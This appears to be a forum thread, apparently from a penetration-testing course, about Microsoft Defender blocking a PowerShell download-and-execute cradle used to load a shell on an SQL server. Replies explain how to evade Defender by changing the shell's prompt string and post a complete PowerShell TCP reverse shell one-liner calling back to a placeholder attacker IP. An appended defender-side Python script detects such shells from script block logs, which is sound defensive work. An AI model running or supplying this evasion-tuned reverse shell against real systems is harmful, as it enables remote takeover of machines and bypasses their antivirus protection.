blanco
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
-
IEX (New-Object Net.WebClient).DownloadString("http:// ip /she …
-
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
I get this error when loading the shell on the SQL server. Has anyone else run into this and solved it already?
Hello,
I had the issue because I was using a PowerShell script from GitHub (copy/paste into my VM failed…), and the solution was in the comments:
if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"
source: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub
However, the script provided in the tutorial does contain the #, so you may want to check that part of your reverse shell.
Regards
The official tutorial contains a typo. There is "# " and it has to be "#" without a space.
$client = New-Object System.Net.Sockets.TCPClient("<Your_IP>",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + "#";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
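A defender-side view of the prompt-string change discussed in this thread, as an added example that is not part of any post: a check keyed on what the script does rather than on the prompt literal gives the same verdict for both variants. It assumes PowerShell script block logging (event ID 4104) exported to dicts with `ScriptBlockId`, `MessageNumber` and `ScriptBlockText`; the trait list, the helper names and the abbreviated sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Traits of an interactive TCP shell. None depends on the prompt literal,
# so swapping "PS ...> " for "#" does not change the verdict.
TRAITS = {
    "tcp_client": re.compile(r"net\.sockets\.tcpclient", re.I),
    "stream_io": re.compile(r"\.getstream\s*\(", re.I),
    "remote_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "write_back": re.compile(r"\.write\s*\(", re.I),
}

def reassemble(events):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order."""
    parts = defaultdict(list)
    for e in events:
        parts[e["ScriptBlockId"]].append((e["MessageNumber"], e["ScriptBlockText"]))
    return {sid: "".join(t for _, t in sorted(frags)) for sid, frags in parts.items()}

def matched_traits(script):
    """Names of the traits present in one script text."""
    return {name for name, rx in TRAITS.items() if rx.search(script)}

def suspicious_blocks(events):
    """ScriptBlockIds whose reassembled text shows every trait together."""
    return sorted(sid for sid, text in reassemble(events).items()
                  if matched_traits(text) == set(TRAITS))

# Constructed samples: abbreviated script text, documentation-range addresses,
# readable labels in place of the GUIDs a real ScriptBlockId would carry.
HEAD = ('$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10",443);'
        '$stream = $client.GetStream();')
TAIL = ('$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + PROMPT;'
        '$stream.Write($sendbyte,0,$sendbyte.Length)')

def ev(sid, num, text):
    return {"ScriptBlockId": sid, "MessageNumber": num, "ScriptBlockText": text}

EVENTS = [
    ev("prompt", 1, HEAD + TAIL.replace("PROMPT", '"PS " + (pwd).Path + "> "')),
    ev("hash-split", 2, TAIL.replace("PROMPT", '"#"')),  # fragments out of order
    ev("hash-split", 1, HEAD),
    ev("port-check", 1, '$c = New-Object System.Net.Sockets.TcpClient; '
                        '$c.Connect("192.0.2.20",443); $c.Close()'),
    ev("local-iex", 1, 'Invoke-Expression (Get-Content .\\build.ps1 -Raw)'),
]

if __name__ == "__main__":
    print(suspicious_blocks(EVENTS))
```

Requiring all traits in one reassembled block keeps the plain port check and the local `Invoke-Expression` call out of the results, while a script logged in several fragments is still matched as a whole.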